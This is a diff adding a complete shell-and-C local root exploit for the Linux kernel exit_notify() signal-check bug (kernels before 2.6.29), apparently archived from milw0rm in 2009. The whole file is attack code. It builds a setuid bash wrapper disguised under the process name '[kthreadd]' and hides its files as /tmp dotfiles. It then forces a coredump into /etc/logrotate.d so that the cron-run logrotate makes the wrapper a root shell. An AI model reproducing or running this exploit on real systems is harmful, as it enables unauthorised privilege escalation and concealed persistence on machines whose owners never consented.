|
| 1 | +#!/bin/sh |
| 2 | + |
| 3 | +################################################################################### |
| 4 | +# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit |
| 5 | +# |
| 6 | +# by Milen Rangelov (gat3way-at-gat3way-dot-eu) |
| 7 | +# |
| 8 | +# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. |
| 9 | +# Basically it allows us to send arbitrary signals to a privileged (suidroot) |
| 10 | +# parent process. Due to a bad check, the child process with appropriate exit signal |
| 11 | +# already set can first execute a suidroot binary then exit() and thus bypass |
| 12 | +# in-kernel privilege checks. We use chfn and gpasswd for that purpose. |
| 13 | +# |
| 14 | +# !!!!!!!!!!! |
| 15 | +# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 |
| 16 | +# so you'll be out of luck most of the time. |
| 17 | +# So it is not going to be the script kiddies' new killer shit :-) |
| 18 | +# !!!!!!!!!!! |
| 19 | +# |
| 20 | +# if you invent a better way to escalate privileges by sending arbitrary signals to |
| 21 | +# the parent process, please mail me :) That was the best I could think of today :-( |
| 22 | +# |
| 23 | +# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness |
| 24 | +# |
| 25 | +# Skuchna rabota... |
| 26 | +# |
| 27 | +#################################################################################### |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | + |
| 32 | +SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` |
| 33 | +if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi |
| 34 | +if [ -d /etc/logrotate.d ]; then |
| 35 | +echo "logrotate installed, that's good!" |
| 36 | +else |
| 37 | +echo "No logrotate installed, sorry!";exit |
| 38 | +fi |
| 39 | + |
| 40 | +echo -e "Compiling the bash setuid() wrapper..." |
| 41 | +cat >> /tmp/.m.c << EOF |
| 42 | +#include <unistd.h> |
| 43 | +#include <sys/types.h> |
| 44 | +
|
| 45 | +int main() |
| 46 | +{ |
| 47 | + setuid(0); |
| 48 | + execl("/bin/bash","[kthreadd]",NULL); |
| 49 | +} |
| 50 | +EOF |
| 51 | + |
| 52 | +cc /tmp/.m.c -o /tmp/.m |
| 53 | +rm /tmp/.m.c |
| 54 | + |
| 55 | +echo -e "Compiling the exploit code..." |
| 56 | + |
| 57 | +cat >> /tmp/exploit.c << EOF |
| 58 | +#include <stdio.h> |
| 59 | +#include <sched.h> |
| 60 | +#include <signal.h> |
| 61 | +#include <stdlib.h> |
| 62 | +#include <unistd.h> |
| 63 | +
|
| 64 | +int child(void *data) |
| 65 | +{ |
| 66 | + sleep(2); |
| 67 | + printf("I'm gonna kill the suidroot father without having root rights :D\n"); |
| 68 | + execl("/usr/bin/gpasswd","%s",NULL); |
| 69 | + exit(0); |
| 70 | +} |
| 71 | +
|
| 72 | +int main() |
| 73 | +{ |
| 74 | + int stacksize = 4*getpagesize(); |
| 75 | + void *stack, *stacktop; |
| 76 | + stack = malloc(stacksize); |
| 77 | + stacktop = stack + stacksize; |
| 78 | + chdir("/etc/logrotate.d"); |
| 79 | + int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); |
| 80 | + if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); |
| 81 | +} |
| 82 | +EOF |
| 83 | + |
| 84 | +cc /tmp/exploit.c -o /tmp/.ex |
| 85 | +rm /tmp/exploit.c |
| 86 | + |
| 87 | +echo -e "Setting coredump limits and running the exploit...\n" |
| 88 | +ulimit -c 10000 |
| 89 | +touch /tmp/.a |
| 90 | +`/tmp/.ex >/dev/null 2>/dev/null` |
| 91 | +sleep 5 |
| 92 | +rm /tmp/.ex |
| 93 | + |
| 94 | +if [ -e /etc/logrotate.d/core ]; then |
| 95 | +echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" |
| 96 | +echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" |
| 97 | +echo -e "\nYour terminal is most probably screwed now, sorry for that..." |
| 98 | +exit |
| 99 | +fi |
| 100 | + |
| 101 | +echo "The system is not vulnerable, sorry :(" |
| 102 | + |
| 103 | +# milw0rm.com [2009-04-08] |
0 commit comments